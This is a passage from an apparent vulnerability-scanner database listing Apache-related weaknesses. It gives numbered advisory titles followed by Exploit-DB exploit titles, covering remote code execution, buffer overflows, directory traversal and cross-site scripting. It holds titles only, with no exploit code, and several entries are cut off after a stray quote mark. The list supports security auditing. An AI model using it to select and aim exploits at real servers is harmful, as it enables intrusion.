6599| [50108] Apache Struts s:a tag and s:url tag cross-site scripting
6600| [50059] Apache mod_proxy_ajp information disclosure
6601| [49951] Apache Tiles Expression Language (EL) expressions cross-site scripting
6602| [49925] Apache Geronimo Web Administrative Console cross-site request forgery
6603| [49924] Apache Geronimo console/portal/Server/Monitoring cross-site scripting
6604| [49921] Apache ActiveMQ Web interface cross-site scripting
6605| [49898] Apache Geronimo Services/Repository directory traversal
6606| [49725] Apache Tomcat mod_jk module information disclosure
6607| [49715] Apache mod_perl Apache::Status and Apache2::Status modules cross-site scripting
6608| [49712] Apache Struts unspecified cross-site scripting
6609| [49213] Apache Tomcat cal2.jsp cross-site scripting
6610| [48934] Apache Tomcat POST doRead method information disclosure
6611| [48211] Apache Tomcat header HTTP request smuggling
6612| [48163] libapache2-mod-auth-mysql module for Debian multibyte encoding SQL injection
6613| [48110] Apache Jackrabbit search.jsp and swr.jsp cross-site scripting
6614| [47709] Apache Roller "
6615| [47104] Novell Netware ApacheAdmin console security bypass
6616| [47086] Apache HTTP Server OS fingerprinting unspecified
6617| [46329] Apache Struts FilterDispatcher and DefaultStaticContentLoader class directory traversal
6618| [45791] Apache Tomcat RemoteFilterValve security bypass
6619| [44435] Oracle WebLogic Apache Connector buffer overflow
6620| [44411] Apache Tomcat allowLinking UTF-8 directory traversal
6621| [44223] Apache HTTP Server mod_proxy_ftp cross-site scripting
6622| [44156] Apache Tomcat RequestDispatcher directory traversal
6623| [44155] Apache Tomcat HttpServletResponse.sendError() cross-site scripting
6624| [43885] Oracle WebLogic Server Apache Connector buffer overflow
6625| [42987] Apache HTTP Server mod_proxy module denial of service
6626| [42915] Apache Tomcat JSP files path disclosure
6627| [42914] Apache Tomcat MS-DOS path disclosure
6628| [42892] Apache Tomcat unspecified unauthorized access
6629| [42816] Apache Tomcat Host Manager cross-site scripting
6630| [42303] Apache 403 error cross-site scripting
6631| [41618] Apache-SSL ExpandCert() authentication bypass
6632| [40761] Apache Derby RDBNAM parameter and DatabaseMetaData.getURL information disclosure
6633| [40736] Apache Tomcat HTTP/1.1 connector information disclosure
6634| [40614] Apache mod_jk2 HTTP Host header buffer overflow
6635| [40562] Apache Geronimo init information disclosure
6636| [40478] Novell Web Manager webadmin-apache.conf security bypass
6637| [40411] Apache Tomcat exception handling information disclosure
6638| [40409] Apache Tomcat native (APR based) connector weak security
6639| [40403] Apache Tomcat quotes and %5C cookie information disclosure
6640| [40388] Sun Java Plug-In org.apache.crimson.tree.XmlDocument security bypass
6641| [39893] Apache HTTP Server mod_negotiation HTTP response splitting
6642| [39867] Apache HTTP Server mod_negotiation cross-site scripting
6643| [39804] Apache Tomcat SingleSignOn information disclosure
6644| [39615] Apache HTTP Server mod_proxy_ftp.c UTF-7 cross-site scripting
6645| [39612] Apache HTTP Server mod_proxy_balancer buffer overflow
6646| [39608] Apache HTTP Server balancer manager cross-site request forgery
6647| [39476] Apache mod_proxy_balancer balancer_handler function denial of service
6648| [39474] Apache HTTP Server mod_proxy_balancer cross-site scripting
6649| [39472] Apache HTTP Server mod_status cross-site scripting
6650| [39201] Apache Tomcat JULI logging weak security
6651| [39158] Apache HTTP Server Windows SMB shares information disclosure
6652| [39001] Apache HTTP Server mod_imap and mod_imagemap module cross-site scripting
6653| [38951] Apache::AuthCAS Perl module cookie SQL injection
6654| [38800] Apache HTTP Server 413 error page cross-site scripting
6655| [38211] Apache Geronimo SQLLoginModule authentication bypass
6656| [37243] Apache Tomcat WebDAV directory traversal
6657| [37178] RHSA update for Apache HTTP Server mod_status module cross-site scripting not installed
6658| [37177] RHSA update for Apache HTTP Server Apache child process denial of service not installed
6659| [37119] RHSA update for Apache mod_auth_kerb off-by-one buffer overflow not installed
6660| [37100] RHSA update for Apache and IBM HTTP Server Expect header cross-site scripting not installed
6661| [36782] Apache Geronimo MEJB unauthorized access
6662| [36586] Apache HTTP Server UTF-7 cross-site scripting
6663| [36468] Apache Geronimo LoginModule security bypass
6664| [36467] Apache Tomcat functions.jsp cross-site scripting
6665| [36402] Apache Tomcat calendar cross-site request forgery
6666| [36354] Apache HTTP Server mod_proxy module denial of service
6667| [36352] Apache HTTP Server ap_proxy_date_canon() denial of service
6668| [36336] Apache Derby lock table privilege escalation
6669| [36335] Apache Derby schema privilege escalation
6670| [36006] Apache Tomcat "
6671| [36001] Apache Tomcat Host Manager Servlet alias cross-site scripting
6672| [35999] Apache Tomcat \"
6673| [35795] Apache Tomcat CookieExample cross-site scripting
6674| [35536] Apache Tomcat SendMailServlet example cross-site scripting
6675| [35384] Apache HTTP Server mod_cache module denial of service
6676| [35097] Apache HTTP Server mod_status module cross-site scripting
6677| [35095] Apache HTTP Server Prefork MPM module denial of service
6678| [34984] Apache HTTP Server recall_headers information disclosure
6679| [34966] Apache HTTP Server MPM content spoofing
6680| [34965] Apache HTTP Server MPM information disclosure
6681| [34963] Apache HTTP Server MPM multiple denial of service
6682| [34872] Apache MyFaces Tomahawk autoscroll parameter cross-site scripting
6683| [34869] Apache Tomcat JSP example Web application cross-site scripting
6684| [34868] Apache Tomcat Manager and Host Manager cross-site scripting
6685| [34496] Apache Tomcat JK Connector security bypass
6686| [34377] Apache Tomcat hello.jsp cross-site scripting
6687| [34212] Apache Tomcat SSL configuration security bypass
6688| [34210] Apache Tomcat Accept-Language cross-site scripting
6689| [34209] Apache Tomcat calendar application cross-site scripting
6690| [34207] Apache Tomcat implicit-objects.jsp cross-site scripting
6691| [34167] Apache Axis WSDL file path disclosure
6692| [34068] Apache Tomcat AJP connector information disclosure
6693| [33584] Apache HTTP Server suEXEC privilege escalation
6694| [32988] Apache Tomcat proxy module directory traversal
6695| [32794] Apache Tomcat JK Web Server Connector map_uri_to_worker() buffer overflow
6696| [32708] Debian Apache tty privilege escalation
6697| [32441] ApacheStats extract() PHP call unspecified
6698| [32128] Apache Tomcat default account
6699| [31680] Apache Tomcat RequestParamExample cross-site scripting
6700| [31649] Apache Tomcat Sample Servlet TroubleShooter detected
6701| [31557] BEA WebLogic Server and WebLogic Express Apache proxy plug-in denial of service
6702| [31236] Apache HTTP Server htpasswd.c strcpy buffer overflow
6703| [30456] Apache mod_auth_kerb off-by-one buffer overflow
6704| [29550] Apache mod_tcl set_var() format string
6705| [28620] Apache and IBM HTTP Server Expect header cross-site scripting
6706| [28357] Apache HTTP Server mod_alias script source information disclosure
6707| [28063] Apache mod_rewrite off-by-one buffer overflow
6708| [27902] Apache Tomcat URL information disclosure
6709| [26786] Apache James SMTP server denial of service
6710| [25680] libapache2 /tmp/svn file upload
6711| [25614] Apache Struts lookupMap cross-site scripting
6712| [25613] Apache Struts ActionForm denial of service
6713| [25612] Apache Struts isCancelled() security bypass
6714| [24965] Apache mod_python FileSession command execution
6715| [24716] Apache James spooler memory leak denial of service
6716| [24159] Apache Geronimo Web-Access-Log Viewer cross-site scripting
6717| [24158] Apache Geronimo jsp-examples cross-site scripting
6718| [24030] Apache auth_ldap module multiple format strings
6719| [24008] Apache mod_ssl custom error message denial of service
6720| [24003] Apache mod_auth_pgsql module multiple syslog format strings
6721| [23612] Apache mod_imap referer field cross-site scripting
6722| [23173] Apache Struts error message cross-site scripting
6723| [22942] Apache Tomcat directory listing denial of service
6724| [22858] Apache Multi-Processing Module code allows denial of service
6725| [22602] RHSA-2005:582 updates for Apache httpd not installed
6726| [22520] Apache mod-auth-shadow "
6727| [22466] ApacheTop symlink
6728| [22109] Apache HTTP Server ssl_engine_kernel client certificate validation
6729| [22006] Apache HTTP Server byte-range filter denial of service
6730| [21567] Apache mod_ssl off-by-one buffer overflow
6731| [21195] Apache HTTP Server header HTTP request smuggling
6732| [20383] Apache HTTP Server htdigest buffer overflow
6733| [19681] Apache Tomcat AJP12 request denial of service
6734| [18993] Apache HTTP server check_forensic symlink attack
6735| [18790] Apache Tomcat Manager cross-site scripting
6736| [18349] Apache HTTP server Apple HFS+ filesystem obtain information
6737| [18348] Apache HTTP server Apple HFS+ filesystem .DS_Store and .ht file disclosure
6738| [18347] Apache HTTP server Apple Mac OS X Server mod_digest_apple module could allow an attacker to replay responses
6739| [17961] Apache Web server ServerTokens has not been set
6740| [17930] Apache HTTP Server HTTP GET request denial of service
6741| [17785] Apache mod_include module buffer overflow
6742| [17671] Apache HTTP Server SSLCipherSuite bypass restrictions
6743| [17473] Apache HTTP Server Satisfy directive allows access to resources
6744| [17413] Apache htpasswd buffer overflow
6745| [17384] Apache HTTP Server environment variable configuration file buffer overflow
6746| [17382] Apache HTTP Server IPv6 apr_util denial of service
6747| [17366] Apache HTTP Server mod_dav module LOCK denial of service
6748| [17273] Apache HTTP Server speculative mode denial of service
6749| [17200] Apache HTTP Server mod_ssl denial of service
6750| [16890] Apache HTTP Server server-info request has been detected
6751| [16889] Apache HTTP Server server-status request has been detected
6752| [16705] Apache mod_ssl format string attack
6753| [16524] Apache HTTP Server ap_get_mime_headers_core denial of service
6754| [16387] Apache HTTP Server mod_proxy Content-Length buffer overflow
6755| [16230] Apache HTTP Server PHP denial of service
6756| [16214] Apache mod_ssl ssl_util_uuencode_binary buffer overflow
6757| [15958] Apache HTTP Server authentication modules memory corruption
6758| [15547] Apache HTTP Server mod_disk_cache local information disclosure
6759| [15540] Apache HTTP Server socket starvation denial of service
6760| [15467] Novell GroupWise WebAccess using Apache Web server allows viewing of files on the server
6761| [15422] Apache HTTP Server mod_access information disclosure
6762| [15419] Apache HTTP Server mod_ssl plain HTTP request denial of service
6763| [15293] Apache for Cygwin "
6764| [15065] Apache-SSL has a default password
6765| [15041] Apache HTTP Server mod_digest module could allow an attacker to replay responses
6766| [15015] Apache httpd server httpd.conf could allow a local user to bypass restrictions
6767| [14751] Apache Mod_python output filter information disclosure
6768| [14125] Apache HTTP Server mod_userdir module information disclosure
6769| [14075] Apache HTTP Server mod_php file descriptor leak
6770| [13703] Apache HTTP Server account
6771| [13689] Apache HTTP Server configuration allows symlinks
6772| [13688] Apache HTTP Server configuration allows SSI
6773| [13687] Apache HTTP Server Server: header value
6774| [13685] Apache HTTP Server ServerTokens value
6775| [13684] Apache HTTP Server ServerSignature value
6776| [13672] Apache HTTP Server config allows directory autoindexing
6777| [13671] Apache HTTP Server default content
6778| [13670] Apache HTTP Server config file directive references outside content root
6779| [13668] Apache HTTP Server httpd not running in chroot environment
6780| [13666] Apache HTTP Server CGI directory contains possible command interpreter or compiler
6781| [13664] Apache HTTP Server config file contains ScriptAlias entry
6782| [13663] Apache HTTP Server CGI support modules loaded
6783| [13661] Apache HTTP Server config file contains AddHandler entry
6784| [13660] Apache HTTP Server 500 error page not CGI script
6785| [13659] Apache HTTP Server 413 error page not CGI script
6786| [13658] Apache HTTP Server 403 error page not CGI script
6787| [13657] Apache HTTP Server 401 error page not CGI script
6788| [13552] Apache HTTP Server mod_cgid module information disclosure
6789| [13550] Apache GET request directory traversal
6790| [13516] Apache Cocoon XMLForm and JXForm could allow execution of code
6791| [13499] Apache Cocoon directory traversal allows downloading of boot.ini file
6792| [13429] Apache Tomcat non-HTTP request denial of service
6793| [13400] Apache HTTP server mod_alias and mod_rewrite buffer overflow
6794| [13295] Apache weak password encryption
6795| [13254] Apache Tomcat .jsp cross-site scripting
6796| [13125] Apache::Gallery Inline::C could allow arbitrary code execution
6797| [13086] Apache Jakarta Tomcat mod_jk format string allows remote access
6798| [12681] Apache HTTP Server mod_proxy could allow mail relaying
6799| [12662] Apache HTTP Server rotatelogs denial of service
6800| [12554] Apache Tomcat stores password in plain text
6801| [12553] Apache HTTP Server redirects and subrequests denial of service
6802| [12552] Apache HTTP Server FTP proxy server denial of service
6803| [12551] Apache HTTP Server prefork MPM denial of service
6804| [12550] Apache HTTP Server weaker than expected encryption
6805| [12549] Apache HTTP Server type-map file denial of service
6806| [12206] Apache Tomcat /opt/tomcat directory insecure permissions
6807| [12102] Apache Jakarta Tomcat MS-DOS device name request denial of service
6808| [12091] Apache HTTP Server apr_password_validate denial of service
6809| [12090] Apache HTTP Server apr_psprintf code execution
6810| [11804] Apache HTTP Server mod_access_referer denial of service
6811| [11750] Apache HTTP Server could leak sensitive file descriptors
6812| [11730] Apache HTTP Server error log and access log terminal escape sequence injection
6813| [11703] Apache long slash path allows directory listing
6814| [11695] Apache HTTP Server LF (Line Feed) denial of service
6815| [11694] Apache HTTP Server filestat.c denial of service
6816| [11438] Apache HTTP Server MIME message boundaries information disclosure
6817| [11412] Apache HTTP Server error log terminal escape sequence injection
6818| [11196] Apache Tomcat examples and ROOT Web applications cross-site scripting
6819| [11195] Apache Tomcat web.xml could be used to read files
6820| [11194] Apache Tomcat URL appended with a null character could list directories
6821| [11139] Apache HTTP Server mass virtual hosting with mod_rewrite or mod_vhost_alias could allow an attacker to obtain files
6822| [11126] Apache HTTP Server illegal character file disclosure
6823| [11125] Apache HTTP Server DOS device name HTTP POST code execution
6824| [11124] Apache HTTP Server DOS device name denial of service
6825| [11088] Apache HTTP Server mod_vhost_alias CGI source disclosure
6826| [10938] Apache HTTP Server printenv test CGI cross-site scripting
6827| [10771] Apache Tomcat mod_jk module multiple HTTP GET request buffer overflow
6828| [10575] Apache mod_php module could allow an attacker to take over the httpd process
6829| [10499] Apache HTTP Server WebDAV HTTP POST view source
6830| [10457] Apache HTTP Server mod_ssl "
6831| [10415] Apache HTTP Server htdigest insecure system() call could allow command execution
6832| [10414] Apache HTTP Server htdigest multiple buffer overflows
6833| [10413] Apache HTTP Server htdigest temporary file race condition
6834| [10412] Apache HTTP Server htpasswd temporary file race condition
6835| [10376] Apache Tomcat invoker servlet used in conjunction with the default servlet reveals source code
6836| [10348] Apache Tomcat HTTP GET request DOS device reference could cause a denial of service
6837| [10281] Apache HTTP Server ab.c ApacheBench long response buffer overflow
6838| [10280] Apache HTTP Server shared memory scorecard overwrite
6839| [10263] Apache Tomcat mod_jk or mod_jserv connector directory disclosure
6840| [10241] Apache HTTP Server Host: header cross-site scripting
6841| [10230] Slapper worm variants A, B, and C target OpenSSL/Apache systems
6842| [10208] Apache HTTP Server mod_dav denial of service
6843| [10206] HP VVOS Apache mod_ssl denial of service
6844| [10200] Apache HTTP Server stderr denial of service
6845| [10175] Apache Tomcat org.apache.catalina.servlets.DefaultServlet reveals source code
6846| [10169] Slapper worm variant (Slapper.C) targets OpenSSL/Apache systems
6847| [10154] Slapper worm variant (Slapper.B) targets OpenSSL/Apache systems
6848| [10098] Slapper worm targets OpenSSL/Apache systems
6849| [9876] Apache HTTP Server cgi/cgid request could disclose the path to a requested script
6850| [9875] Apache HTTP Server .var file request could disclose installation path
6851| [9863] Apache Tomcat web.xml file could allow a remote attacker to bypass restrictions
6852| [9808] Apache HTTP Server non-Unix version URL encoded directory traversal
6853| [9623] Apache HTTP Server ap_log_rerror() path disclosure
6854| [9520] Apache Tomcat /servlet/ mapping cross-site scripting
6855| [9415] Apache HTTP Server mod_ssl .htaccess off-by-one buffer overflow
6856| [9396] Apache Tomcat null character to threads denial of service
6857| [9394] Apache Tomcat HTTP request for LPT9 reveals Web root path
6858| [9249] Apache HTTP Server chunked encoding heap buffer overflow
6859| [9208] Apache Tomcat sample file requests could reveal directory listing and path to Web root directory
6860| [8932] Apache Tomcat example class information disclosure
6861| [8633] Apache HTTP Server with mod_rewrite could allow an attacker to bypass directives
6862| [8629] Apache HTTP Server double-reverse DNS lookup spoofing
6863| [8589] Apache HTTP Server for Windows DOS batch file remote command execution
6864| [8457] Oracle9i Application Server Apache PL/SQL HTTP Location header buffer overflow
6865| [8455] Oracle9i Application Server default installation could allow an attacker to access certain Apache Services
6866| [8400] Apache HTTP Server mod_frontpage buffer overflows
6867| [8326] Apache HTTP Server multiple MIME headers (sioux) denial of service
6868| [8308] Apache "
6869| [8275] Apache HTTP Server with Multiviews enabled could disclose directory contents
6870| [8119] Apache and PHP OPTIONS request reveals "
6871| [8054] Apache is running on the system
6872| [8029] Mandrake Linux default Apache configuration could allow an attacker to browse files and directories
6873| [8027] Mandrake Linux default Apache configuration has remote management interface enabled
6874| [8026] Mandrake Linux Apache sample programs could disclose sensitive information about the server
6875| [7836] Apache HTTP Server log directory denial of service
6876| [7815] Apache for Windows "
6877| [7810] Apache HTTP request could result in unexpected behavior
6878| [7599] Apache Tomcat reveals installation path
6879| [7494] Apache "
6880| [7419] Apache Web Server could allow remote attackers to overwrite .log files
6881| [7363] Apache Web Server hidden HTTP requests
6882| [7249] Apache mod_proxy denial of service
6883| [7129] Linux with Apache Web server could allow an attacker to determine if a specified username exists
6884| [7103] Apple Mac OS X used with Apache Web server could disclose directory contents
6885| [7059] Apache "
6886| [7057] Apache "
6887| [7056] Apache "
6888| [7055] Apache "
6889| [7054] Apache "
6890| [6997] Apache Jakarta Tomcat error message may reveal information
6891| [6971] Apache Jakarta Tomcat may reveal JSP source code with missing HTTP protocol specification
6892| [6970] Apache crafted HTTP request could reveal the internal IP address
6893| [6921] Apache long slash path allows directory listing
6894| [6687] Apple Mac OS X used with Apache Web server could allow arbitrary file disclosure
6895| [6527] Apache Web Server for Windows and OS2 denial of service
6896| [6316] Apache Jakarta Tomcat may reveal JSP source code
6897| [6305] Apache Jakarta Tomcat directory traversal
6898| [5926] Linux Apache symbolic link
6899| [5659] Apache Web server discloses files when used with php script
6900| [5310] Apache mod_rewrite allows attacker to view arbitrary files
6901| [5204] Apache WebDAV directory listings
6902| [5197] Apache Web server reveals CGI script source code
6903| [5160] Apache Jakarta Tomcat default installation
6904| [5099] Trustix Secure Linux installs Apache with world writable access
6905| [4968] Apache Jakarta Tomcat snoop servlet gives out information which could be used in attack
6906| [4967] Apache Jakarta Tomcat 404 error reveals the pathname of the requested file
6907| [4931] Apache source.asp example file allows users to write to files
6908| [4575] IBM HTTP Server running Apache allows users to directory listing and file retrieval
6909| [4205] Apache Jakarta Tomcat delivers file contents
6910| [2084] Apache on Debian by default serves the /usr/doc directory
6911| [1630] MessageMedia UnityMail and Apache Web server MIME header flood denial of service
6912| [697] Apache HTTP server beck exploit
6913| [331] Apache cookies buffer overflow
6914|
6915| Exploit-DB - https://www.exploit-db.com:
6916| [31130] Apache Tomcat <= 6.0.15 Cookie Quote Handling Remote Information Disclosure Vulnerability
6917| [31052] Apache <= 2.2.6 'mod_negotiation' HTML Injection and HTTP Response Splitting Vulnerability
6918| [30901] Apache HTTP Server 2.2.6 Windows Share PHP File Extension Mapping Information Disclosure Vulnerability
6919| [30835] Apache HTTP Server <= 2.2.4 413 Error HTTP Request Method Cross-Site Scripting Weakness
6920| [30563] Apache Tomcat <= 5.5.15 Cal2.JSP Cross-Site Scripting Vulnerability
6921| [30496] Apache Tomcat <= 6.0.13 Cookie Handling Quote Delimiter Session ID Disclosure
6922| [30495] Apache Tomcat <= 6.0.13 Host Manager Servlet Cross Site Scripting Vulnerability
6923| [30191] Apache MyFaces Tomahawk JSF Framework 1.1.5 Autoscroll Parameter Cross Site Scripting Vulnerability
6924| [30189] Apache Tomcat <= 6.0.13 JSP Example Web Applications Cross Site Scripting Vulnerability
6925| [30052] Apache Tomcat 6.0.10 Documentation Sample Application Multiple Cross-Site Scripting Vulnerabilities
6926| [29930] Apache AXIS 1.0 Non-Existent WSDL Path Information Disclosure Vulnerability
6927| [29859] Apache Roller OGNL Injection
6928| [29739] Apache HTTP Server Tomcat 5.x/6.0.x Directory Traversal Vulnerability
6929| [29435] Apache Tomcat 5.5.25 - CSRF Vulnerabilities
6930| [29316] Apache + PHP 5.x - Remote Code Execution (Multithreaded Scanner) (2)
6931| [29290] Apache / PHP 5.x Remote Code Execution Exploit
6932| [28713] Apache Tomcat/JBoss EJBInvokerServlet / JMXInvokerServlet (RMI over HTTP) Marshalled Object RCE
6933| [28424] Apache 2.x HTTP Server Arbitrary HTTP Request Headers Security Weakness
6934| [28365] Apache 2.2.2 CGI Script Source Code Information Disclosure Vulnerability
6935| [28254] Apache Tomcat 5 Information Disclosure Vulnerability
6936| [27915] Apache James 2.2 SMTP Denial of Service Vulnerability
6937| [27397] Apache suEXEC Privilege Elevation / Information Disclosure
6938| [27135] Apache Struts 2 DefaultActionMapper Prefixes OGNL Code Execution
6939| [27096] Apache Geronimo 1.0 Error Page XSS
6940| [27095] Apache Tomcat / Geronimo 1.0 Sample Script cal2.jsp time Parameter XSS
6941| [26710] Apache CXF prior to 2.5.10, 2.6.7 and 2.7.4 - Denial of Service
6942| [26542] Apache Struts 1.2.7 Error Response Cross-Site Scripting Vulnerability
6943| [25986] Plesk Apache Zeroday Remote Exploit
6944| [25980] Apache Struts includeParams Remote Code Execution
6945| [25625] Apache 1.3.x HTDigest Realm Command Line Argument Buffer Overflow Vulnerability (2)
6946| [25624] Apache 1.3.x HTDigest Realm Command Line Argument Buffer Overflow Vulnerability (1)
6947| [24874] Apache Struts ParametersInterceptor Remote Code Execution
6948| [24744] Apache Rave 0.11 - 0.20 - User Information Disclosure
6949| [24694] Apache 1.3.x mod_include Local Buffer Overflow Vulnerability
6950| [24590] Apache 2.0.x mod_ssl Remote Denial of Service Vulnerability
6951| [23751] Apache Cygwin 1.3.x/2.0.x Directory Traversal Vulnerability
6952| [23581] Apache 2.0.4x mod_perl Module File Descriptor Leakage Vulnerability
6953| [23482] Apache 2.0.4x mod_php Module File Descriptor Leakage Vulnerability (2)
6954| [23481] Apache 2.0.4x mod_php Module File Descriptor Leakage Vulnerability (1)
6955| [23296] Red Hat Apache 2.0.40 Directory Index Default Configuration Error
6956| [23282] apache cocoon 2.14/2.2 - Directory Traversal vulnerability
6957| [23245] Apache Tomcat 4.0.x Non-HTTP Request Denial of Service Vulnerability
6958| [23119] Apache::Gallery 0.4/0.5/0.6 Insecure Local File Storage Privilege Escalation Vulnerability
6959| [22505] Apache Mod_Access_Referer 1.0.2 NULL Pointer Dereference Denial of Service Vulnerability
6960| [22205] Apache Tomcat 3.x Null Byte Directory/File Disclosure Vulnerability
6961| [22191] Apache Web Server 2.0.x MS-DOS Device Name Denial of Service Vulnerability
6962| [22068] Apache 1.3.x,Tomcat 4.0.x/4.1.x Mod_JK Chunked Encoding Denial of Service Vulnerability
6963| [21885] Apache 1.3/2.0.x Server Side Include Cross Site Scripting Vulnerability
6964| [21882] Apache Tomcat 3.2 Directory Disclosure Vulnerability
6965| [21854] Apache 2.0.39/40 Oversized STDERR Buffer Denial of Service Vulnerability
6966| [21853] Apache Tomcat 3/4 DefaultServlet File Disclosure Vulnerability
6967| [21734] Apache Tomcat 4.1 JSP Request Cross Site Scripting Vulnerability
6968| [21719] Apache 2.0 Path Disclosure Vulnerability
6969| [21697] Apache 2.0 Encoded Backslash Directory Traversal Vulnerability
6970| [21605] Apache Tomcat 4.0.3 DoS Device Name Cross Site Scripting Vulnerability
6971| [21604] Apache Tomcat 4.0.3 Servlet Mapping Cross Site Scripting Vulnerability
6972| [21560] Apache 1.x/2.0.x Chunked-Encoding Memory Corruption Vulnerability (2)
6973| [21559] Apache 1.x/2.0.x Chunked-Encoding Memory Corruption Vulnerability (1)
6974| [21534] Apache Tomcat 3/4 JSP Engine Denial of Service Vulnerability
6975| [21492] Apache Tomcat 3.2.3/3.2.4 RealPath.JSP Malformed Request Information Disclosure
6976| [21491] Apache Tomcat 3.2.3/3.2.4 Example Files Web Root Path Disclosure
6977| [21490] Apache Tomcat 3.2.3/3.2.4 Source.JSP Malformed Request Information Disclosure
6978| [21412] Apache Tomcat 4.0/4.1 Servlet Path Disclosure Vulnerability
6979| [21350] Apache Win32 1.3.x/2.0.x Batch File Remote Command Execution Vulnerability
6980| [21204] Apache 1.3.20 Win32 PHP.EXE Remote File Disclosure Vulnerability
6981| [21112] Red Hat Linux 7.0 Apache Remote Username Enumeration Vulnerability
6982| [21067] Apache 1.0/1.2/1.3 Server Address Disclosure Vulnerability
6983| [21002] Apache 1.3 Possible Directory Index Disclosure Vulnerability
6984| [20911] Apache 1.3.14 Mac File Protection Bypass Vulnerability
6985| [20716] apache tomcat 3.0 - Directory Traversal vulnerability
6986| [20695] Apache 1.3 Artificially Long Slash Path Directory Listing Vulnerability (4)
6987| [20694] Apache 1.3 Artificially Long Slash Path Directory Listing Vulnerability (3)
6988| [20693] Apache 1.3 Artificially Long Slash Path Directory Listing Vulnerability (2)
6989| [20692] Apache 1.3 Artificially Long Slash Path Directory Listing Vulnerability (1)
6990| [20595] NCSA 1.3/1.4.x/1.5,Apache httpd 0.8.11/0.8.14 ScriptAlias Source Retrieval Vulnerability
6991| [20558] Apache 1.2 Web Server DoS Vulnerability
6992| [20466] Apache 1.3 Web Server with Php 3 File Disclosure Vulnerability
6993| [20435] Apache 0.8.x/1.0.x,NCSA httpd 1.x test-cgi Directory Listing Vulnerability
6994| [20272] Apache 1.2.5/1.3.1,UnityMail 2.0 MIME Header DoS Vulnerability
6995| [20210] Apache 1.3.12 WebDAV Directory Listings Vulnerability
6996| [20131] Apache Tomcat 3.1 Path Revealing Vulnerability
6997| [19975] Apache 1.3.6/1.3.9/1.3.11/1.3.12/1.3.20 Root Directory Access Vulnerability
6998| [19828] Cobalt RaQ 2.0/3.0 Apache .htaccess Disclosure Vulnerability
6999| [19536] Apache <= 1.1,NCSA httpd <= 1.5.2,Netscape Server 1.12/1.1/2.0 a nph-test-cgi Vulnerability
7000| [19231] PHP apache_request_headers Function Buffer Overflow
7001| [18984] Apache Struts <= 2.2.1.1 - Remote Command Execution
7002| [18897] Oracle Weblogic Apache Connector POST Request Buffer Overflow
7003| [18619] Apache Tomcat Remote Exploit (PUT Request) and Account Scanner
7004| [18452] Apache Struts Multiple Persistent Cross-Site Scripting Vulnerabilities
7005| [18442] Apache httpOnly Cookie Disclosure
7006| [18329] Apache Struts2 <= 2.3.1 - Multiple Vulnerabilities
7007| [18221] Apache HTTP Server Denial of Service
7008| [17969] Apache mod_proxy Reverse Proxy Exposure Vulnerability PoC
7009| [17696] Apache httpd Remote Denial of Service (memory exhaustion)
7010| [17691] Apache Struts < 2.2.0 - Remote Command Execution
7011| [16798] Apache mod_jk 1.2.20 Buffer Overflow
7012| [16782] Apache Win32 Chunked Encoding
7013| [16752] Apache module mod_rewrite LDAP protocol Buffer Overflow
7014| [16317] Apache Tomcat Manager Application Deployer Authenticated Code Execution
7015| [15710] Apache Archiva 1.0 - 1.3.1 CSRF Vulnerability
7016| [15319] Apache 2.2 (Windows) Local Denial of Service
7017| [14617] Apache JackRabbit 2.0.0 webapp XPath Injection
7018| [14489] Apache Tomcat < 6.0.18 utf8 - Directory Traversal vulnerability
7019| [12721] Apache Axis2 1.4.1 - Local File Inclusion Vulnerability
7020| [12689] Authenticated Cross-Site Scripting Vulnerability (XSS) within Apache Axis2 administration console
7021| [12343] Apache Tomcat 5.5.0 to 5.5.29 & 6.0.0 to 6.0.26 - Information Disclosure Vulnerability
7022| [12330] Apache OFBiz - Multiple XSS
7023| [12264] Apache OFBiz - FULLADMIN Creator PoC Payload
7024| [12263] Apache OFBiz - SQL Remote Execution PoC Payload
7025| [11662] Apache Spamassassin Milter Plugin Remote Root Command Execution
7026| [11650] Apache 2.2.14 mod_isapi Dangling Pointer Remote SYSTEM Exploit
7027| [10811] Joomla.Tutorials GHDB: Apache directory listing Download Vulnerability
7028| [10292] Apache Tomcat 3.2.1 - 404 Error Page Cross Site Scripting Vulnerability
7029| [9995] Apache Tomcat Form Authentication Username Enumeration Weakness
7030| [9994] Apache Tomcat Cookie Quote Handling Remote Information Disclosure Vulnerability
7031| [9993] Apache mod_perl 'Apache::Status' and 'Apache2::Status' Cross Site Scripting Vulnerability
7032| [8842] Apache mod_dav / svn Remote Denial of Service Exploit
7033| [8458] Apache Geronimo <= 2.1.3 - Multiple Directory Traversal Vulnerabilities
7034| [7264] Apache Tomcat runtime.getRuntime().exec() Privilege Escalation (win)
7035| [6229] apache tomcat < 6.0.18 utf8 - Directory Traversal vulnerability
7036| [6100] Apache mod_jk 1.2.19 Remote Buffer Overflow Exploit (win32)
7037| [6089] Bea Weblogic Apache Connector Code Exec / Denial of Service Exploit
7038| [5386] Apache Tomcat Connector jk2-2.0.2 (mod_jk2) Remote Overflow Exploit
7039| [5330] Apache 2.0 mod_jk2 2.0.2 - Remote Buffer Overflow Exploit (win32)
7040| [4552] Apache Tomcat (webdav) Remote File Disclosure Exploit (ssl support)
7041| [4530] Apache Tomcat (webdav) Remote File Disclosure Exploit
7042| [4162] Apache Tomcat Connector (mod_jk) Remote Exploit (exec-shield)
7043| [4093] Apache mod_jk 1.2.19/1.2.20 Remote Buffer Overflow Exploit
7044| [3996] Apache 2.0.58 mod_rewrite Remote Overflow Exploit (win2k3)
7045| [3680] Apache Mod_Rewrite Off-by-one Remote Overflow Exploit (win32)
7046| [3384] Ubuntu/Debian Apache 1.3.33/1.3.34 (CGI TTY) Local Root Exploit
7047| [2237] Apache < 1.3.37, 2.0.59, 2.2.3 (mod_rewrite) Remote Overflow PoC
7048| [2061] Apache Tomcat < 5.5.17 Remote Directory Listing Vulnerability
7049| [1056] Apache <= 2.0.49 Arbitrary Long HTTP Headers Denial of Service
7050| [855] Apache <= 2.0.52 HTTP GET request Denial of Service Exploit
7051| [764] Apache OpenSSL - Remote Exploit (Multiple Targets) (OpenFuckV2.c)
7052| [587] Apache <= 1.3.31 mod_include Local Buffer Overflow Exploit
7053| [466] htpasswd Apache 1.3.31 - Local Exploit
7054| [371] Apache HTTPd Arbitrary Long HTTP Headers DoS (c version)
7055| [360] Apache HTTPd Arbitrary Long HTTP Headers DoS
7056| [132] Apache 1.3.x - 2.0.48 - mod_userdir Remote Users Disclosure Exploit
7057| [126] Apache mod_gzip (with debug_mode) <= 1.2.26.1a Remote Exploit
7058| [67] Apache 1.3.x mod_mylo Remote Code Execution Exploit
7059| [38] Apache <= 2.0.45 APR Remote Exploit -Apache-Knacker.pl
7060| [34] Webfroot Shoutbox < 2.32 (Apache) Remote Exploit
